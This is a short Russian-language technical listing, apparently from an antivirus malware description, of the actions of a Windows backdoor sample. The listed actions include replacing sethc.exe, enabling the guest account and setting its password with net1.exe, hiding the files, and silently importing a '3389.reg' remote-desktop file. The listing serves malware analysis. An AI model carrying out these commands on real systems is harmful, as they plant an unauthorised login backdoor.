Техническая информация
- <SYSTEM32>\dllcache\sethc.exe
- <SYSTEM32>\sethc.exe
- <SYSTEM32>\dllcache\sethc.exe файлом <SYSTEM32>\dllcache\sethc.exe.new
- <SYSTEM32>\net1.exe user guest /active:yes
- <SYSTEM32>\net1.exe localgroup %USERNAME%s guest /add
- <SYSTEM32>\net1.exe user guest "522700850"
- <SYSTEM32>\attrib.exe <SYSTEM32>\dllcache\sethc.exe +h
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\fsjk3389shift.bat" "
- %WINDIR%\regedit.exe /s 3389.reg
- <SYSTEM32>\attrib.exe <SYSTEM32>\sethc.exe +h
- <SYSTEM32>\dllcache\sethc.exe.new
- <Текущая директория>\3389.reg
- %TEMP%\1.tmp\fsjk3389shift.bat
- %TEMP%\1.tmp\fsjk3389shift.bat
- <Текущая директория>\3389.reg
- ClassName: 'RegEdit_RegEdit' WindowName: ''